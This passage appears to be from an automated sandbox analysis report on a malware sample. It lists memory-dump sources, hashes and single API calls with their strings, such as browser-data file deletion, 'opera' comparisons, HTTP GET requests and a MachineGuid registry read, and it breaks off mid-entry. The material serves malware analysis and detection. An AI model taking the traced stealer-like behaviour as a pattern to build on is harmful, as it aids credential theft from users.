                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 1304948518-4000257214
                                                                                                                                                                        • Opcode ID: 02c5fad55053558de216ba8b1f27d8b5614e3aa14d077fb9bd1e019b92c36125
                                                                                                                                                                        • Instruction ID: 68e42761a071b971988e713d7a9329dab67c9a2d3ba34c18d10423fa7915a5d5
                                                                                                                                                                        • Opcode Fuzzy Hash: 02c5fad55053558de216ba8b1f27d8b5614e3aa14d077fb9bd1e019b92c36125
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F313D76B000509FCB45DF9CDCA1EDD77B5AF89704B0840B9E509E3361EA70AA598B8A
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0041F52D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                        • String ID: _webdata.db
                                                                                                                                                                        • API String ID: 4033686569-3003761311
                                                                                                                                                                        • Opcode ID: 03fcb68b62edd4cc0901e0f3f2b8d30333fbd9d85706720921ba04f5b00529a0
                                                                                                                                                                        • Instruction ID: febba02e00eb5ad1abc6f1f573f127c299e56ac6d3cf98a7cc9ac6699806af15
                                                                                                                                                                        • Opcode Fuzzy Hash: 03fcb68b62edd4cc0901e0f3f2b8d30333fbd9d85706720921ba04f5b00529a0
                                                                                                                                                                        • Instruction Fuzzy Hash: B2415E76A002149FCB05DF9CDC90ADD77F0FF48200B084079E815E3360E774AA54CB9A
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,opera), ref: 00427624
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: opera
                                                                                                                                                                        • API String ID: 0-3755996268
                                                                                                                                                                        • Opcode ID: b7fe60d4d8f5da63bc881c80491bedc57024296b70a16a8426c2c8ba6effc35b
                                                                                                                                                                        • Instruction ID: 28ce37bdba63fdf670f2eb3483226be30b20697ebd68f19dc6878048ad365f53
                                                                                                                                                                        • Opcode Fuzzy Hash: b7fe60d4d8f5da63bc881c80491bedc57024296b70a16a8426c2c8ba6effc35b
                                                                                                                                                                        • Instruction Fuzzy Hash: E4412C79A005099FCB04DF68CC84EA6B3B5FF84314B048669E865C73A5EB70FD55CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,opera), ref: 00427BBC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: opera
                                                                                                                                                                        • API String ID: 0-3755996268
                                                                                                                                                                        • Opcode ID: 9da8590b77eade4db0e2217ae06534993612669f1f8ec0b058a2f14459546fb2
                                                                                                                                                                        • Instruction ID: fbf94a1aac6f0649c4d01888ffc6c9a1ee9089d9d0ad002a494abf0b5efeb30b
                                                                                                                                                                        • Opcode Fuzzy Hash: 9da8590b77eade4db0e2217ae06534993612669f1f8ec0b058a2f14459546fb2
                                                                                                                                                                        • Instruction Fuzzy Hash: 48415E39B005099FC704DF68CC84EAAB7B5FF48224B04825AEC2487365EB70F959CB95
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0043D159
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                        • API String ID: 2029273394-4073750446
                                                                                                                                                                        • Opcode ID: ade8a3065079f7fe2d63767ac0aee6f01b968f0c9dc8346f63dba5972e83ab9a
                                                                                                                                                                        • Instruction ID: e5dcfcbca1b397e97a14285671db9a32f8ddeef68fab5e5639752cc47cd7be3d
                                                                                                                                                                        • Opcode Fuzzy Hash: ade8a3065079f7fe2d63767ac0aee6f01b968f0c9dc8346f63dba5972e83ab9a
                                                                                                                                                                        • Instruction Fuzzy Hash: D521A5B15182459BC314CB64DD90AAAB3E8EFD4704F04871CE85983211FBB6BA99CB96
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVolumeInformationA.KERNEL32 ref: 00430E41
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationVolume
                                                                                                                                                                        • String ID: C
                                                                                                                                                                        • API String ID: 2039140958-1037565863
                                                                                                                                                                        • Opcode ID: 89265af47b8e42f5e2c63c97d8abce5dbfdc09ea21575686cc3411b91f916200
                                                                                                                                                                        • Instruction ID: 939abc69a031ece2d24172328d78f5e51984fd98eee70f60e92d9ab8a2c1987a
                                                                                                                                                                        • Opcode Fuzzy Hash: 89265af47b8e42f5e2c63c97d8abce5dbfdc09ea21575686cc3411b91f916200
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D1157316087409FD340DF28CC94A5DBBE0EF9A308F09C55DE598A7322E371DA86CB96
                                                                                                                                                                        APIs
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpOpenRequest
                                                                                                                                                                        • String ID: GET
                                                                                                                                                                        • API String ID: 1984915467-1805413626
                                                                                                                                                                        • Opcode ID: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
                                                                                                                                                                        • Instruction ID: 8e83dcfa2c2d97efb602a18a9ba3dc01c5ea0efa355a390095ddbcd516262747
                                                                                                                                                                        • Opcode Fuzzy Hash: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
                                                                                                                                                                        • Instruction Fuzzy Hash: D6012CB5F15229DFE710DFA8CC80E7B77F9EB48700B154024E910E7321E6B49C018B65
                                                                                                                                                                        APIs
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpOpenRequest
                                                                                                                                                                        • String ID: GET
                                                                                                                                                                        • API String ID: 1984915467-1805413626
                                                                                                                                                                        • Opcode ID: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                        • Instruction ID: 746a938a8d7015067999d655a9801a7b5ec994f78fa219be27d916c50eeeb009
                                                                                                                                                                        • Opcode Fuzzy Hash: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                        • Instruction Fuzzy Hash: 2401EC75F11129DFE710DFA8DC80E7B77F9EB48710B058124E910E7325E7B598118B65
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,?,?,?,?), ref: 0043258B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID: MachineGuid
                                                                                                                                                                        • API String ID: 3660427363-4186287252
                                                                                                                                                                        • Opcode ID: c94459e4085fe888039338f2c7fdbaf626c6212497e0a00956e94f0ed3ebcbd5
                                                                                                                                                                        • Instruction ID: 5ba472d5fa0efd0d9b5ca7829f604563e49436e1e198017096eada5890ab671b
